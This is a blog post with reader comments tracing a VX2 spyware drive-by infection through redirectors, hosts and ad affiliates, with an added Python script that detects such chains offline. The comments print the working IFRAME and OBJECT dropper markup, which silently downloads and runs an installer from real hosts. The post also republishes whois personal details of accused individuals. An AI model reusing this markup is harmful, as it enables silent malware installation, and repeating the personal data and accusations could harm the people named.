Follow the Money; or, why does my computer keep getting infested with spyware?

[EDIT] This particular post has generated a very large amount of email, and apparently is being read by a large number of people infected with VX2. As a result, I’ve edited it, to clean up typos and to add additional information about the exploits used, the way VX2 works, and the sources of the spyware scourge. New information is identified with [EDIT].

If you’re reading this post and you’re on a Windows computer, the odds are overwhelming–between 80% and 90%–that you are infected with at least one virus or spyware program, and the odds are very high that you’re infected with dozens or hundreds.

Yes, you. Even if you are technically literate, you have a firewall, and you never download suspicious attachments, you are almost certainly infected. There is lots and lots and lots of money in computer viruses and spyware, especially the variety that makes popup ads appear on your machine. The question I’ve always had, though, is who’s making all this money by infecting your computer?

A couple of nights ago, Shelly’s computer became infected. Shelly’s technically savvy, the apartment we live in is on a closed private network with a hardware firewall between us and the Internet, and she also runs a software firewall on her computer; she became infected nonetheless.

I spent about six hours removing the infection, and also tracking down the source of the infection, and painstakingly backtracking all the popup ads that the adware displayed on her computer. My goal: Follow the money. Discover where the infection came from, and who was making money from it. The results were, to say the least, interesting.

If you don’t care about stuff like this, you can skip the rest of this message. If you’re curious about the mechanisms by which spyware and viruses work, who is responsible for them, why they’re so common, how they spread, and most important, who makes money by creating and releasing them:

Shelly’s computer started behaving strangely, taking a long time to boot and displaying popup ads whenever she launched Internet Explorer, late Wednesday afternoon. Running the anti-spyware program Ad-Aware revealed that the computer was infected with a very nasty bit of malware called VX2, first introduced to the Internet public by a company calling itself VX2, which has since become defunct. The VX2 program has continued to be developed and to become nastier, more destructive, and more malicious as time goes on; today’s VX2 is extremely sophisticated, highly destructive, and almost impossible to remove.

Ad-Aware and a similar program called Spybot Search & Destroy could see the infection, but could not remove it. VX2 remains memory-resident, even if its files are deleted, and constantly monitors attempts to get rid of it; if it is removed or the computer’s Registry is changed, this evil little bastard changes the Registry back and rewrites itself to disk under a different name. It also sets itself up as a critical system service (so it runs even when the computer is booted in safe mode), and cloaks itself so that it does not appear in the Task Manager. [EDIT]: Earlier versions of VX2 could only conceal themselves in the Task Manager under Windows 95/98/Me; VX2 Variant 3 appears to be able to conceal itself in the Task Manager under Windows NT/2000/XP as well.

Ad-Aware has a special plug-in module written especially to remove VX2. This plug-in confirmed that Shelly’s computer was infected with what it described as “VX2 Variant 3,” but even the plug-in could not remove the infection; it appears that Shelly had become infected with a brand-new VX2 variant, more cunning and more malicious than even the worst variant known to Ad-Aware.

But from where?

Now things get interesting. In following the source of the infection, I ended up on a virtual trip that went from Dallas, Texas, through servers in Russia and Nevada, and finally back to the source in Rosemount, Minnesota. Along the way, it involved a surprising number of big-name, supposedly reputable companies, all of whom are profiting either directly or indirectly from viruses and spyware.


Shelly’s computer first became infected when her browser visited the Web address “http://69.20.56.3/ normal/yyy12.html”. At the time I am writing this, this Web address is still active. *** WARNING *** WARNING *** WARNING I have put a space in this URL to keep people from clicking accidentally on it. Do NOT visit this URL if you are on a Windows machine and you’re using Internet Explorer. You WILL become infected. I don’t know what brought her to that site; it may have been a redirect, a browser hijack, even a maliciously constructed banner ad.

[EDIT]: The site infects a computer using an Explorer iFrame exploit. Put most simply, if a Web page contains an iFrame that points to another Web page containing an OBJECT tag, the file referenced in the OBJECT tag (in this case, a dropper for VX2) is downloaded and installed silently, without the user’s knowledge or consent. Versions of Internet Explorer prior to the version that shipped with Windows XP SP2 are all vulnerable; I have not tested the version of Explorer that shipped with XP SP2 or versions patched by subsequent security fixes. I do know that Microsoft has since closed several iFrame exploits. I do not know if this exploit is one of them.

The Web site at 69.20.56.3 is running on a computer whose ISP connection is provided by a company called Rackspace, a large and busy Texas-based ISP with international offices and a long history of supporting and condoning spam and other unethical behavior; in fact, Rackspace even has its own entire section on the Blackholes.us spam support blacklisting service.

So Rackspace is the first company profiting from the infection; they’re making money by providing Internet connections for the URL hosting the malware dropper. Remember the name Rackspace; we’ll be seeing it again later.

So. Moving along: The virus-dropping Web site at 69.20.56.3 is nothing but a simple redirector. It redirects to “http://213.159.98.203/ ads/banners/banner3.php?ID=1”. Again, I have put a space in this URL. Do NOT visit this URL if you are on a Windows machine and using a vulnerable version of Explorer; you WILL become infected. [EDIT]: This page is referenced by an iFrame from the preceding page, and contains an iFrame pointing to the next server in the chain, which contains the actual dropper; we’ll get to that in a moment.

This Web site is hosted on a server in Russia; the ISP is a Russian service called Linkey.ru. They are the second group of people in the chain making money from viruses and spyware, by hosting a virus dropper. I don’t know if they’re a knowing participant or just an innocent ISP who’s unknowingly hosting a virus dropper. [EDIT]: Additional information from a helpful reader on the news.admin.net-abuse.email newsgroup:
The Russian-hosted Web site is:
http://213.159.98.203/ = Adsavior.com
11/08/04 11:05:06 dns Adsavior.com
Adsavior.com NS (Nameserver) ns1.adsavior.biz
Adsavior.com NS (Nameserver) ns2.adsavior.biz
Adsavior.com A (Address) 213.159.98.203
mail.Adsavior.com A (Address) 213.159.98.209
ns1.adsavior.biz A (Address) 213.159.98.204
ns2.adsavior.biz A (Address) 213.159.98.208
Organization:
Adsavior Inc.
James Finlayson
#395-1027 Davie St.
Vancouver, BC V6E4L2
CA
Phone: 6046969057
Email: jamesinflames69@hotmail.com
Registrar Name….: Register.com
Registrar Whois…: whois.register.com
Registrar Homepage: http://www.register.com
Domain Name: ADSAVIOR.COM
Created on…………..: Thu, Sep 16, 2004
Expires on…………..: Fri, Sep 16, 2005
Record last updated on..: Mon, Oct 04, 2004
It appears that linkey.ru and IPs in the same general block as “Adsavior.com” are well known for Net abuse. Mr. Finlayson, another Canadian, appears to be deeply involved in this particular virus/adware gang as well.

Onward and upward: The Russian virus host itself is also nothing but a redirector. Clearly, the person responsible for the virus wants to put some distance between himself and the virus; we’ve already gone through two redirectors in two countries. The Russian Web site contains an Internet Explorer iFrame exploit which causes Internet Explorer to load a program from the URL “http://www.xzoomy.com/ stc.php?stid=007”. Once again, I have put a space in the URL; if you visit this Web site, and allow your browser to download the executable that it references, you’ll be infected with VX2.

Now we’re getting somewhere. The xzoomy.com Web site is a search engine that’s well-known in anti-virus and anti-spyware circles. Xzoomy.com makes a small profit every time someone uses their Web page to do a search; they have a long and ignoble history of attracting visitors through the use of spyware, adware, and viruses. They’ve been responsible for their own spyware/adware software, and they’ve got their hands in an Internet gambling site called “free scratch and win” as well. These guys are looking more and more like our scumbags, eh? This site is registered to:

XzoomY.COM
Mike Cass (domains@adscpm.com)
+1.2042984015
Fax: +1.0000000000
181 Coniston St
Winnipeg, MB R2H1P8
CA

So Mike Cass is up to his ears in this mess. Mike’s Web site, well-known for being the source of spyware and adware, is hosted by an ISP called Peer 1 Network, an outfit in Montreal known to be indifferent to spammers. Mike and Peer 1 Network are making money here–Peer 1 by hosting Mike’s Web site in spite of the fact that it’s known to be associated with adware and spyware, Mike because he makes money every time someone visits his site. But wait, there’s more!

The xzoomy.com Web site is another redirector. It redirects to “http://www.2nd-thought.com/ files/install007.exe” (I’ve put a space in the URL); and it loads and executes the Windows program install007.exe from the 2nd-thought.com Web site by using an OBJECT tag. [EDIT]: This file, install007.exe, is the actual executable that installs the adware. If you’re using Explorer for Windows and you visit any of the pages before this in the chain, install007.exe downloads and runs silently without prompting you, because the OBJECT tag that references it is contained inside an iFrame. This is also why other browsers are safer; they don’t recognize the iFrame tag.

The program install007.exe loads and runs as soon as the browser hits that page; the computer’s owner never gets any warning and has no opportunity to stop it. As you may have guessed, install007.exe installs VX2 on the victim’s computer.

Note that all this–the numerous redirects, downloading the program from the 2nd-thought Web site, installing the VX2 virus–all happened automatically and silently; at no point is the computer owner aware of what is going on, and at no point does the computer owner know that a virus is being loaded onto his computer.
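To make the chain described above concrete from a defender’s side, here is an added example (my code, not part of the original post) that walks a set of constructed, offline pages in the same shape as the chain: a 0x0 IFRAME, then a 1x1 IFRAME, then an OBJECT whose codebase is an executable. The host names, paths and CLSID in it are placeholders, not the real sites named in the post.

```python
"""Flag a silent drive-by chain: hidden IFRAME -> hidden IFRAME -> OBJECT
whose codebase is an executable. Everything below runs offline against a
constructed page corpus on example.invalid-style hosts (placeholders)."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed corpus (URL -> page body). The tag shapes mirror the ones the
# post quotes; hosts, paths and the CLSID are placeholders, not real sites.
PAGES = {
    "http://redirector-a.example/normal/page.html":
        '<IFRAME SRC="http://redirector-b.example/ads/banner.php?ID=1" '
        'height="0" width="0" SCROLLING=no MARGINHEIGHT=0 MARGINWIDTH=0 FRAMEBORDER=0>',
    "http://redirector-b.example/ads/banner.php?ID=1":
        '<iframe src=http://search-site.example/stc.php?stid=007 '
        'width="1" height="1" frameborder="0"></iframe>',
    "http://search-site.example/stc.php?stid=007":
        '<object id=install classid="CLSID:00000000-0000-0000-0000-000000000000" '
        'codebase="http://dropper.example/files/installer.exe">',
    # A benign page with an ordinary, visible frame, for contrast.
    "http://benign.example/":
        '<html><body><iframe src="/widget.html" width="300" height="250">'
        '</iframe></body></html>',
    "http://benign.example/widget.html": "<p>hello</p>",
}


def _is_hidden(attrs):
    """A frame sized 0x0 or 1x1 (the sizes used in the chain) is invisible."""
    def dim(name):
        m = re.match(r"\s*(\d+)", attrs.get(name, ""))
        return int(m.group(1)) if m else None
    w, h = dim("width"), dim("height")
    return w is not None and h is not None and w <= 1 and h <= 1


class DropperTagParser(HTMLParser):
    """Collect IFRAME targets and OBJECT codebase URLs from one page body."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.iframes = []  # (absolute src, is_hidden)
        self.objects = []  # (absolute codebase, classid)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}  # tag names arrive lowercased
        if tag == "iframe" and a.get("src"):
            self.iframes.append((urljoin(self.base_url, a["src"]), _is_hidden(a)))
        elif tag == "object" and a.get("codebase"):
            self.objects.append((urljoin(self.base_url, a["codebase"]), a.get("classid", "")))


def follow_chain(start_url, fetch, max_hops=6):
    """Walk nested IFRAMEs from start_url. fetch(url) returns a body or None.
    Returns (hops, first_executable_codebase). Stops on loops, dead ends and
    unreachable pages so a malicious chain cannot make the walker spin."""
    hops, seen, url, exe = [], set(), start_url, None
    while url and len(hops) < max_hops:
        if url in seen:
            hops.append({"url": url, "status": "loop"})
            break
        seen.add(url)
        body = fetch(url)
        if body is None:
            hops.append({"url": url, "status": "unreachable"})
            break
        p = DropperTagParser(url)
        p.feed(body)
        hops.append({"url": url,
                     "hidden_iframes": sum(1 for _, hid in p.iframes if hid),
                     "objects": [u for u, _ in p.objects]})
        for codebase, _ in p.objects:
            if exe is None and urlparse(codebase).path.lower().endswith(".exe"):
                exe = codebase
        # Each page in the chain held exactly one frame; follow the first one.
        url = p.iframes[0][0] if p.iframes else None
    return hops, exe


def assess(start_url, fetch):
    """Summarise a chain walk into a verdict a responder can act on."""
    hops, exe = follow_chain(start_url, fetch)
    hidden = sum(h.get("hidden_iframes", 0) for h in hops)
    if exe and hidden:
        verdict = "silent dropper chain"
    elif exe:
        verdict = "executable OBJECT behind a visible frame"
    elif hidden:
        verdict = "hidden iframe(s), no executable found"
    else:
        verdict = "nothing suspicious"
    return {"verdict": verdict, "hops": len(hops), "hidden_iframes": hidden,
            "executable": exe,
            "hosts": [urlparse(h["url"]).netloc for h in hops]}


if __name__ == "__main__":
    print(assess("http://redirector-a.example/normal/page.html", PAGES.get))
    print(assess("http://benign.example/", PAGES.get))
```

In a real investigation the `fetch` callable would be a non-rendering fetcher such as the `lynx -source` approach a commenter describes below, so that nothing in the chain is executed while it is being mapped.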

2nd-thought.com is the primary villain here. They are hosting the installer itself; they are the people actually placing VX2 on the victims’ computers without permission or notification. Let’s take a look-see and find out who these guys are:

Domain name: 2nd-thought.com

Registrant Contact:

Don Lativalle (abuse@2nd-thought.com)
+1.5198514015
Fax: +1.0000000000
3597 boul St-Jean
Dollard des Ormeaux, H9X2B5
CA

Well, lookit that, another Canuck. What is up with Canadian spyware and virus profiteers, eh? Does Canada have particularly lax computer-crime laws?

2nd-thought.com is hosted by Peer 1 Networks as well. 2nd-thought.com is also a well-known scourge on the Internet, notorious for releasing a spyware program that changes your home page to their page, and for redirecting search engine searches you do to porn sites. That’s two scumbags with long histories of Internet abuse, both hosted on Peer 1 Networks and both, apparently, now working together. Mike Cass, Don Lativalle, and Peer 1 Networks: three people or organizations with shady pasts and questionable ethics, three people or organizations who are apparently involved with loading VX2 onto Shelly’s computer.


So now we know how VX2 ended up on Shelly’s computer. We know what people are responsible, we know what businesses support and profit from them, and we know they’ve gone to a whole lot of trouble and effort to hide themselves. We know that the people, Mike Cass and Don Lativalle, have histories of releasing spyware and adware to infect people’s computers, we know they run for-profit Web sites, and we know that they have independently established histories of using dubious and unethical practices to get traffic to those Web sites. We know they’re both Canadian, we know they have found a Canadian ISP in Peer 1 Networks willing to turn a blind eye to outrageous network abuse, and we know that they appear to have teamed up to spread an extremely malicious variant of a program already known for being almost impossible to get rid of.

What’s left is discovering the why. What’s the mechanism by which they make money? How do they profit from infecting you with VX2? Where does the money come from, and where does it go?

For that, I had to turn to the actions that this VX2 variant takes once it’s infected the computer, and to the ads it serves up.


This particular strain of VX2 does two things. First, it carries a payload unusual for adware; it loads another adware program called Bargain Buddy. Bargain Buddy’s Web site is at cashbackbuddy.com, which is hosted by Globix, a Web-hosting company headquartered in the United Kingdom.

The cashbackbuddy.com Web site attempts to get people to deliberately infect themselves with the Bargain Buddy scumware by telling them “the new Software helps the end-user maximize his/her savings and gain cash back commissions from purchases made at all participating on-line and some offline merchants” (and so on, and so on). CashBackBuddy and its scumware is operated by an outfit called eXact Advertising:

eXact Advertising
101 W. 23rd Street, PMB 2392
New York, New York 10011
United States
646-223-1227

eXact Advertising owns a number of different Internet properties, including pay-for-placement search engines, Mail.com, a personals Web site called “luvbandit,” and so on.

The Bargain Buddy software is pretty straightforward: every now and then, it loads an ad on the victim’s computer. Each time an ad is served, eXact Advertising makes a few cents from the advertisers who pay for the ads. Some of this money goes to Bargain Buddy “referrers;” the rest is profit.

So what that means is that if I sign up with eXact Advertising, then I get you to put the Bargain Buddy adware on your computer, every time an ad pops up, the advertiser pays eXact Advertising some money, and eXact Advertising pays me some money.

eXact Advertising claims to be “opt-in;” they say the only way you’ll get Bargain Buddy is if you explicitly sign up and put it on your computer voluntarily. They lie, of course; the fact that they’re doing business with referrers such as Mike Cass and Don Lativalle, who use very sneaky ways indeed to get the software onto your computer, proves it. They pretend to be good guys helping consumers save money; in reality, they don’t care so long as people can be cajoled, tricked, or forced into installing their software, with or without their consent.


So. Now Shelly’s computer is infected with two adware programs: Bargain Buddy by eXact Advertising, who is paying the people responsible for the infection, and a custom version of VX2, which prevents itself from being removed easily, installs Bargain Buddy, and also serves ads on its own.

Now popup ads are popping up all over the place. Some of them are from eXact Advertising, a shady company that’s written its own custom adware. Some of them are from VX2 itself. It’s the latter ones, the ones that VX2 is generating, that are the most interesting.

VX2 brings in ads from, of all places, Revenue.net, a very large mainstream online advertising broker that serves up banner ads, popup and popunder ads, and contextual ads for a lot of big-name clients. Revenue.net does serve popup ads and popunder ads, primarily from Web sites rather than adware. The ads being brought in from the VX2 infection were being pulled from Revenue.net; the persons responsible for the VX2 infection were Revenue.net affiliates.

I fired off an email to Revenue.net, with the URLs of some of the popup ads being pulled in by the virus. Revenue.net, rather to my surprise, actually responded, and claimed that the affiliate code attached to the popup ads appearing on Shelly’s computer belonged to an outfit calling itself “look2me.com”.

Look2me.com is–surprise surprise–a Web advertising company that makes money from popup ads. Look2me.com is a Revenue.net affiliate; Look2me.com gets people to view ads produced by Revenue.net, the advertiser pays Revenue.net, who then pays a percentage of the take to look2me.com.

Look2me.com is hosted by…wait for it…Rackspace! Told you their name would pop up again.

Look2me.com is owned by:

NicTech Networks info@look2me.com
3860 W 150TH ST
Rosemount, Minnesota 55068
United States
866-705-2728

NicTech Networks also owns a dating service called “SimilarSingles.com”. Sound familiar? eXact Advertising, based in New York, is an Internet advertising company that serves popup ads on virus-infected computers and also owns an online dating service. NicTech Networks, based in Minnesota, is an Internet advertising company that serves popup ads on virus-infected computers and also owns an online dating service. Two well-known and unethical Canadians, Mike Cass and Don Lativalle, each with separate histories of profiting from adware and malware, are jointly responsible for a computer infection which serves popup ads from eXact Advertising and NicTech Networks. NicTech Networks is hosted by Rackspace; the initial point of infection of the virus is a Web site hosted by Rackspace.


Rackspace is looking pretty bad here. In fact, Rackspace and Peer 1 Networks are both obviously dirty; both are up to their elbows in hosting and providing services for people who make money by serving popup ads through viruses and malware. It’s hard to argue that either Rackspace or Peer 1 Networks is simply being duped by a client, particularly in light of the fact that emails to both outfits concerning this situation go unanswered, and in light of the fact that the virus-dropping Web site is still up three days after I’ve emailed the responsible hosts. [EDIT]: After complaining to both ISPs, I still have not had a response from either. As of this writing, neither Rackspace nor Peer1 has taken any action against the Web sites named in this report.

So. Advertisers pay eXact Advertising and Revenue.net. eXact Advertising and Revenue.net then go on to pay affiliates who have infected target computers with malware to serve up the ads. The affiliates host their virus-dropping Web sites, along with Web sites that profit in other ways from viruses and malware, on Canadian ISP Peer 1 Networks and American ISP Rackspace.com. The money goes from the advertisers to eXact Advertising and Revenue.net; some of this money then goes to the affiliates, who infect the computers with malware; some of the money the virus-spreaders make in turn goes to Peer 1 Networks and Rackspace, who turn a blind eye to what their clients are doing. But where does the money originate? Obviously, the advertisers are only buying ads because they think the ads will work; that means somebody is clicking on these popup ads and buying the advertisers’ products.

But who on earth would spend money on an annoying popup ad? What could possibly induce someone to take out his wallet when everyone knows that virus-spawned popup ads are among the most annoying things on Earth?

Ah, that’s the pure genius of it–that’s the brilliance of the scheme, honed to a fine edge. The popup ads you get when you’re infected with VX2? They advertise…

…spyware removal and popup blocking tools.

342 thoughts on “Follow the Money; or, why does my computer keep getting infested with spyware?”

  1. Great writeup. Makes it pretty obvious why one might want to consider using another browser, eh? (or, for the extreme, perhaps a different operating system? 🙂

    • Yep. As a result of this problem, I think I’m installing another browser, possibly Firefox, on Shelly’s computer this evening.

      I use Windows, Linux, MacOS, and other operating systems–unfortunately, some applications (such as games) require using Windows. My primary machines are Mac and Linux systems, though; I try not to keep anything vital on my Windows machines, in case I have to wipe ’em. Unfortunately, Shelly doesn’t have that luxury.

      • I’m with you on that. Firefox all the way (both in Linux and MacOS) for me. Fortunately, I don’t have to deal with a Windows system. Strangely enough, I’ve never had a Windows system — went directly from MacOS to Linux, and have only recently strayed back, now that MacOS doesn’t suck nearly as much as it used to 😉

        • I’m currently using FireFox, and it doesn’t make that big a difference, really. If I go a week or so without running SpyBot, when I finally do run it, it finds SKAJILLIONS of spyware. (Spywares?)

          I have it running automatically every night; almost every morning, it tells me it’s found five items. I don’t know if they’re the SAME five items that are simply resisting removal, or if I just pick them up on my usual daily rounds of websurfing.

          • I’ve been using firefox for a couple of months now and haven’t picked up a single piece of spyware. None that spambot or adaware have picked up on anyway. With IE I was picking up about 40 a week.

            Perhaps there’s a setting that needs tweaking somewhere?

          • Most of the spyware you’re seeing is probably just cookies. Clear out the cookies in Firefox right before you run Spybot, and then see how much it comes up with.

          • Check out SpywareBlaster – it’ll stop IE and Firefox from bringing in new spyware/adware bots onto your computer in the first place. Either google it, or there’s a link inside of SpyBot (if ya question its authenticity), but it works awesomely.

          • I have five persistent DSO exploits that Spybot finds EVERY TIME. I am sure it’s the same infection.

            I almost never get new spyware infections since switching to FireFox.

            Is it possible you have an IE hijack that’s still running IE spyware installs even when you’re not using it?

          • If it’s DSO Exploit that keeps popping up, that’s a bug in Spybot. It flags an insecure registry value that Microsoft has long since patched, but then it changes it to a value that’s perfectly safe but isn’t the value it’s looking for, so it keeps finding it and fixing it wrong. Upgrade to the latest Spybot, the problem was fixed not too long ago. But it was never actually a risk as long as you’ve kept up with updates to Windows and IE.

            And yeah, I know your comment is old, but I just stumbled across this entry because someone linked to it in the spywareinfo.com forums. ^_^;

  3. First of all, I’m going to do some investigating on my own. Like calling the local police station and inquiring about their dealings with computer crimes and what falls under the definition of such. See, it’s interesting — both Mike Cass and Don Lativalle have phone numbers that resolve to Rogers AT&T cellphones. Interestingly enough, despite Don’s address being on the outskirts of Montreal, his phone claims he’s my neighbour — out in London, ON. Not sure what that indicates, but just an interesting fact.

    I’d also be most curious to know the technical details of how you’ve traced it through that many hops. If you don’t mind sharing, of course.

    • Not at all!

      I found the initial point of infection–69.20.56.3–by looking in Shelly’s Explorer history file, which retains even redirects. From there, I visited the site on my MacOS X machine using Safari, which allows me to view the source code of a page even if the page has one of those damn stupid Javascript things designed to prevent me from doing so.

      That page’s source is nothing more than a single tag, without even HTML, HEAD, or BODY tags:

      <IFRAME SRC="http://213.159.98.203/ ads/banners/banner3.php?ID=1" height="0" width="0" SCROLLING=no MARGINHEIGHT=0 MARGINWIDTH=0 FRAMEBORDER=0/> (note that I’ve inserted a space in the URL within the IFRAME tag).

      So I manually visited that page with Safari; its source is likewise a single iFrame tag:

      <iframe src=http://www.xzoomy.com/ stc.php?stid=007 width="1" height="1" frameborder="0">

      The source of THAT page is a single OBJECT tag, as follows:

      <object id=install classid="CLSID:13197ACE-6851-45c3-A7FF-C281324D5489" codebase="http://www.2nd-thought.com/ files/install007.exe"> (mind the space in the URL, as usual).

      Install007.exe is, as you can guess, the actual executable for the malware.

      The rest was a matter of using dig, traceroute, and whois searches. Whois on “xzoomy.com” produced the name Mike Cass; whois on “2nd-thought.com,” the actual host of the malware dropper, produced the name Don Lativalle. Dig and traceroute turned up Rackspace and Peer 1 as the hosts of the named Web sites.

      Given the lengths to which they’ve gone to hide their involvement, using redirectors scattered all over the place, it’s not one bit surprising to me that they’re using cell phones as their contact phone numbers, or that their contact addresses in the Whois registry might not be real.

      • Viewing HTML Source Safely

        I think one of the safest ways to do the research you describe would be to use Lynx instead of anything graphical. Available for Linux and Windows (and working on a Mac port, it seems), it’s easy to just download the source and display it on the screen.

        lynx -source http://yoururlhere.tld/yadda/yadda/yadda/biginfection.html

        will dump the source code to the screen.

        Another item of interest is using the -head option to just retrieve and display the header. For the first URL you listed (the start of the journey to infection):

        HTTP/1.1 200 OK
        Date: Tue, 09 Nov 2004 16:05:49 GMT
        Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_python/2.7.8 Python/1.5.2 mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.7 mod_perl/1.26
        Last-Modified: Mon, 18 Oct 2004 03:00:17 GMT
        ETag: “330223-90-417331c1”
        Accept-Ranges: bytes
        Content-Length: 144
        Connection: close
        Content-Type: text/html

        Lynx can be found at http://lynx.browser.org/. And no, I’m not a developer; I’m just someone who gets a lot of utility out of the program.

        A very good writeup. Thanks for the information.

        — Matt

        • Re: Viewing HTML Source Safely

          That’s a most excellent suggestion. I’d like to see Lynx available for Macs, as I don’t feel comfortable doing this kind of research from a Windows box regardless of the type of browser, though I think I’m going to install Lynx on my Linux box this evening. It looks like a good tool for the arsenal. Thanks!

        • Re: Viewing HTML Source Safely

          Just a note:
          The head on that apache server shows that it’s quite out of date, and is subject to numerous vulnerabilities.

        • Re: Viewing HTML Source Safely

          (Edit…)
          One of the safest ways to view HTML code is to use something such as, say, telnet. That way, you see the code as it is.
          I’ve coded my own program, CodeFetch, that’ll allow the viewing of any HTML page – just enter the URL and go. It’s a simple thing I made in VB (No, it doesn’t use Inet, it uses Winsock).
          So far, I’ve had no problems with it (not that there really could be any, considering the way it works).

          Oops, I should’ve read the whole thing first… I forgot about Lynx’s -head option…

          • Re: Viewing HTML Source Safely

            Could you post the vb source for CodeFetch?
            I would like to know how to read http from vb.

          • Re: Viewing HTML Source Safely

            Mmh. Someone asked me to post the source code of CodeFetch, but I can’t reply to their comment yet (due to it still being screened), so I’ll just write my reply here.

            All you need is a Winsock control. Read the help for that control, it contains some valuable information on how to use and control it. Then all you need is to open a connection (TCP, port 80) and send the command and other HTTP headers:
            Winsock.SendData "GET " & URL(1) & " HTTP/1.1" & vbCrLf
            Winsock.SendData "Host: " & URL(0) & vbCrLf
            Winsock.SendData vbCrLf
            Other headers you can send are Accept, Cache-control, Connection, User-Agent, Host, etc.. Remember to end with a CR+LF combination (DON’T use vbNewLine) otherwise the server’ll sit there, waiting for the rest of the data (and possibly just close the connection on you). I suggest that you set both User-Agent (to the name of your app, along with version, notes, URL, etc.) and the Host (the domain you’re trying to reach – important, because otherwise you might, for example, get the index of http://www.yahoo.com instead of mail.yahoo.com).
            All data that you receive, you can just plop into a textbox of some kind.

            For more information, you should read the RFC for the HTTP protocol:
            http://www.google.ca/search?hl=en&q=RFC+HTTP

    • Unlikely. Knowing that someone has committed a crime and proving it in court are two different things, especially in light of the fact that they appear to be in Canada and I’m in the US. It’s not even entirely clear that what they’re doing violates Canadian or US law, though clearly it should.

      What I’d like to do is send them a bill for the time it took me to clean up the infection. I doubt that’d work, though.

    • Yeah, as tacit said, unlikely. I’m a network systems analyst at a managed security services provider, and I can tell you from personal experience that spam and spyware does not get prosecuted; the FBI is just not interested in crimes that cause such little tangible damage. Now, if you can show that it infected a bank or a government institution and caused actual financial loss, then their ears perk up. That, or if there’s child porn involved. It’s scary how quickly the FBI will jump on a case involving child porn. But for general spyware and adware cases like described above, they won’t do anything. Very good writeup BTW.

    • I was thinking the same thing.

      I used to do something similar on the college library. I would trace back who installed software that shouldn’t be there. It eventually started to lead to a group of young men. They turned out to be crackers. They’d managed to gain root on a couple of our servers. The most we were able to do to them, though, was to ban them from the lab, since the dean was friends with one’s mother. *shrugs*

  5. when I take over the world, you will be appointed my minister of “hunting people down so I can have them tortured, maimed, then left bleeding from open wounds in a horribly dirty cell filled with infectious bacteria.”

    you are a good man, Franklin. Highly useful.

        • Re: are we safe?

          Yes, though even if you use Firefox, it’s still important to run Windows Update on a regular basis. There are security vulnerabilities in Internet Explorer which can be exploited even if you are not using Explorer as your browser.

          • Re: are we safe?

            I showed the last redirect (starts object id=install) to the webmaster at my job and he said that ALL browsers would be vulnerable to this exploit. Would you be so kind as to explain how this exploit works in IE and why Firefox is safe.
            Thank you in advance,
            Joel Adams

          • Re: are we safe?

            The key behind the exploit is that in Explorer, it loads the “install007.exe” application without asking you first. It should load the application only after asking you, which is (I believe, though I have not tested it) what would happen in a different browser. Any browser can, in theory, load the installer, but not without your permission.

          • Re: are we safe?

            (Coming at you via ‘s LJ…)

            I’ve recently run into a spyware dropper that, although not silent, still has FF and all other ‘zilla browsers attempt to install spyware. Here’s a screenshot (hosted on my own web server):

            http://www.caspeed.com/lj04/webbug1.png

            The javascript that drops the spyware has a section expressly devoted to Netscape installs. If the user is clueless and clicks install anyways, they get the bug.

            It’s only a matter of time before Zilla family browsers have a serious hijacker written for them. Enough people will click the install button anyways that it will be worth the spammers effort to do so.

            More on this exploit attempt in my own blog at: http://www.livejournal.com/users/makovette/393159.html

            CYa!
            Mako

  7. I don’t know what brought her to that site; it may have been a redirect, a browser hijack, even a maliciously-constructed banner ad.

    VX2 got onto my system through the MSN toolbar. It’s a stealth installer that can come in piggybacked on dozens of things. I’ve got two others, at the moment, that come in off of Yahoo and Google’s toolbars respectively.

    (Unfortunately, I can’t disable either of those as I need them to run testing on our software as our users install them all the T*!#)*&!#&(*#!%^) time. The only way I’ve gotten around their services is to leave Spybot’s agent running and it will tell you whether anything’s attempting to change the registry and running Webroot’s spyware software package that notifies you and allows you to disable it.

    My current programs for spyware that are running as agents:

    Ad-Aware (for removal only)
    SpyBot S&D (agent running)
    Pest Patron (agent running)
    Webroot’s Spy Sweeper (agent running)

    Just as FYI, since you probably know most of it. 🙂

    • In this particular case, neither Ad-Aware nor Spybot S&D could remove the infection. Ad-Aware has a special plugin just for VX2, and the plugin identified “VX2 Variant 3” on the computer and claimed to remove it, but didn’t. That’s why I suspect that what this was is some new variant on VX2 that’s designed to evade current VX2 cleaners.

      I haven’t tried Pest patron or Spy Sweeper. I suppose I could reinfect the computer and give them a go, but all things considered, I’d rather not. 🙂 It would, however, be helpful to know whether either of them can deal with this VX2 variant.

      • Typo

        I think that should be ‘Pest Patrol’ not patron. It isn’t freeware, so I haven’t gotten around to using it yet, but their website allows you to perform a scan on your system that catches stuff (like a particular IE toolbar I absolutely loathe) that AdAware and Spybot can’t. (I removed so much garbage from my parents’ computer I can’t be sure what did what, but anything that appends a gigantic ad to the top of your homepage when you start your browser, requiring you to scroll down to view the site, necessitates deaths instead of legal action.)

  9. Yep. As a result of this problem, I think I’m installing another browser, possibly Firefox, on Shelly’s computer this evening.

    I use Windows, Linux, MacOS, and other operating systems–unfortunately, some applications (such as games) require using Windows. My primary machines are Mac and Linux systems, though; i try not to keep anything vital on my Windows machines, in case I have to wipe ’em. Unfortunately, Shelly doesn’t have that luxury.

  10. Not at all!

    I found the initial point of infection–69.20.56.3–by looking in Shelly’s Explorer history file, which retains even redirects. From there, I visited the site on my MacOS X machine using Safari, which allows me to view the source code of a page even if the page has one of those damn stupid Javascript things designed to prevent me from doing so.

    That page’s source is nothing more than a single tag, without even HTML, HEAD, or BODY tags:

    <IFRAME SRC="http://213.159.98.203/ ads/banners/banner3.php?ID=1" height="0" width="0" SCROLLING=no MARGINHEIGHT=0 MARGINWIDTH=0 FRAMEBORDER=0> (note that I’ve inserted a space in the URL within the IFRAME tag).

    So I manually visited that page with Safari; its source is likewise a single iFrame tag:

    <iframe src=http://www.xzoomy.com/ stc.php?stid=007 width="1" height="1" frameborder="0">

    the source of THAT page is a single OBJECT tag, as follows:

    <object id=install classid="CLSID:13197ACE-6851-45c3-A7FF-C281324D5489" codebase="http://www.2nd-thought.com/ files/install007.exe"> (mind the space in the URL, as usual).

    Install007.exe is, as you can guess, the actual executable for the malware.

    The rest was a matter of using dig, traceroute, and whois searches. Whois on “xzoomy.com” produced the name Mike Cass; whois on “2nd-thought.com,” the actual host of the malware dropper, produced the name Don Lativalle. Dig and traceroute turned up Rackspace and Peer 1 as the hosts of the named Web sites.

